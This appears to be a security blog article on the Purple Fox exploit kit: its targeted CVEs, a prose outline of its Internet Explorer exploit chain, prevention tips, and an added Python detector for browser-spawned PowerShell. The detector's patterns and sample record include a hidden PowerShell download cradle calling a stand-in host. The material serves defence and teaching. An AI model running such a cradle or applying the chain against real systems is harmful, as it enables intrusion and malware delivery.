
Purple Fox malware: What it is, how it works and how to prevent it

September 16, 2020, by Greg Belding

Without question, there has been a marked die-off in the usage of Exploit Kits (EK). The Purple Fox exploit kit is a type of malware that is defying this recent trend and has had some new life breathed into it. This slightly stale malware formerly used a third-party EK to achieve its operator’s malicious goals; the new variant recently had new Microsoft exploits added to its arsenal. This is typical EK operator behavior: keeping the kit’s exploit set current so that it keeps working against systems that receive regular updates.

This article will explore Purple Fox and detail what it is, how it works and how you can prevent it. It may be true that EKs are falling to the wayside in the face of other malware, but Purple Fox is demonstrating that there is still a place at the table for EKs.


What is Purple Fox?

Originally a fileless downloader Trojan, Purple Fox was delivered by another EK named RIG and infected at least 30,000 systems. In 2019, it shifted to using Windows PowerShell to retrieve and deliver malware, and its operators made it the replacement for the RIG EK.

This means the Purple Fox malware family no longer needs a third-party EK in its attack campaigns, and it proves that EKs are still an aspect of the threat landscape that needs to be taken seriously. It also highlights that malware is essentially run like a business, with development moved in-house to save money.

Targeting vulnerabilities is not new functionality for Purple Fox: its original variant was observed targeting CVE-2018-15982, CVE-2014-6332, CVE-2018-8174, CVE-2015-1701 and CVE-2018-8120. The new and improved variant was first observed in September 2019, loaded with two new high-severity Microsoft exploits.

The first of these, CVE-2019-1458, is a local privilege elevation vulnerability in Windows. The second, CVE-2020-0674, is an Internet Explorer vulnerability. Microsoft has since patched both. According to Proofpoint researchers, this demonstrates that Purple Fox’s operators are staying on top of current vulnerabilities and updating the malware as new ones become available.

The primary purpose of Purple Fox is to distribute other malware onto systems it infects. These types of malware include Trojans, information stealers, ransomware and cryptominers owned and operated by what has been dubbed the Purple Fox gang.

How does Purple Fox work?

The main goal of this malware, like other EKs, is to exploit vulnerabilities so that Purple Fox can run PowerShell to download additional malware onto the compromised system. Initial infection typically works like this: the user visits a malicious site hosting the Purple Fox EK. If the user’s system has unpatched vulnerabilities that Purple Fox targets, the malware is covertly downloaded while the user is on the site. Traffic to these malicious sites is normally driven by redirects from malicious advertisements (malvertising) and by phishing emails.

Once infection has taken root (in the case of the Windows 10 Internet Explorer exploit, CVE-2020-0674), Purple Fox targets the web browser’s use of jscript.dll, the JScript engine library that ships with Windows. The malware leaks an address from a RegExp object located within jscript.dll. The malicious JavaScript then looks for the jscript.dll PE header, which it uses to locate the kernel32.dll import descriptor; that descriptor exposes the memory- and process-manipulation functions the Purple Fox EK uses to load its shellcode. The shellcode then finds WinExec and creates the process that actually begins the malware’s execution.

After execution, Purple Fox has been observed using its rootkit capability to hide its registry entries and files once the compromised system is restarted. To enable its rootkit components, the malware abuses open-source code as well as file utility software. This lets Purple Fox hide its DLL to stymie the reverse-engineering and analysis attempts that information security professionals may undertake once Purple Fox has been detected.

How to prevent Purple Fox

All of this malware activity, as scary as it may seem, was caused by the simple act of visiting a malicious site from an unpatched system. It should be noted that prevention is definitely possible and, like the method of infection, fairly easy to accomplish.

Below are some tips that will help prevent your system from falling victim to Purple Fox.

  • One of the new exploits added to Purple Fox is CVE-2019-1458, which allows for local privilege elevation. Purple Fox prevention is therefore centered in part on enforcing the principle of least privilege. Securing the use of, and restricting privileges to, administrator tools is paramount to enforcing that principle
  • The most obvious advice toward Purple Fox prevention is regularly updating and patching your system(s)
  • Adding more advanced layers of security to your network will enrich your Purple Fox prevention capability. Consider adding anti-malware solutions that use behavior monitoring, and strengthen your intrusion detection capabilities with security solutions that use AI/machine learning
  • Never neglect your cybersecurity awareness training — make sure to touch on the fact that EKs are still out there in the wild and are still a threat
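The behavior-monitoring tip above maps directly onto the infection chain described earlier: a browser being exploited and then spawning PowerShell to fetch the next stage. The following is an added example (not code from the article or from any vendor product) that runs that detection logic over constructed process-creation records. It assumes Sysmon Event ID 1 field names (Image, ParentImage, CommandLine); the records are sample data, not real telemetry.

```python
"""Flag process-creation records that look like the Purple Fox chain:
a browser spawning PowerShell that downloads or hides its launch.
Field names follow Sysmon Event ID 1; all records are constructed."""
import re

BROWSERS = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

# Command-line traits typical of a download cradle or a hidden launch
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b"
    r"|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|bypass",
    re.IGNORECASE)

def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_record(rec: dict) -> list:
    """Return the reasons a record matches; an empty list means no match."""
    reasons = []
    image = basename(rec.get("Image", ""))
    parent = basename(rec.get("ParentImage", ""))
    cmd = rec.get("CommandLine", "")
    if image in SHELLS and parent in BROWSERS:
        reasons.append(f"{parent} spawned {image}")
    if image in SHELLS and CRADLE_RE.search(cmd):
        reasons.append("download-cradle or hidden-launch flags in command line")
    return reasons

def find_suspicious(records: list) -> list:
    """Run score_record over every record; keep (index, reasons) for hits."""
    return [(i, r) for i, rec in enumerate(records) if (r := score_record(rec))]

# Constructed sample records (not taken from a real host)
SAMPLE_RECORDS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "CommandLine": "powershell -w hidden -ep bypass -c IEX (New-Object "
                    "Net.WebClient).DownloadString('http://example.invalid/p')"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe Get-ChildItem C:\\Users"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for idx, why in find_suspicious(SAMPLE_RECORDS):
        print(f"record {idx}: " + "; ".join(why))
```

Only the first record is flagged, on both counts (browser parent and cradle flags); the interactive PowerShell session and the browser-spawned notepad are left alone.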

Conclusion

Exploit Kits (EK) used to be one of the most popular types of malware. Lately, they have gone the way of dial-up — essentially phased out by other malware and tools that can do what EKs do and more. Purple Fox is an EK that uses the tried-and-true practice of regularly updating itself with new exploits to stay ahead of the pack of candidate systems to compromise.

If you use the tips given above, your system will stand apart from this pack and Purple Fox will be stopped in its tracks.
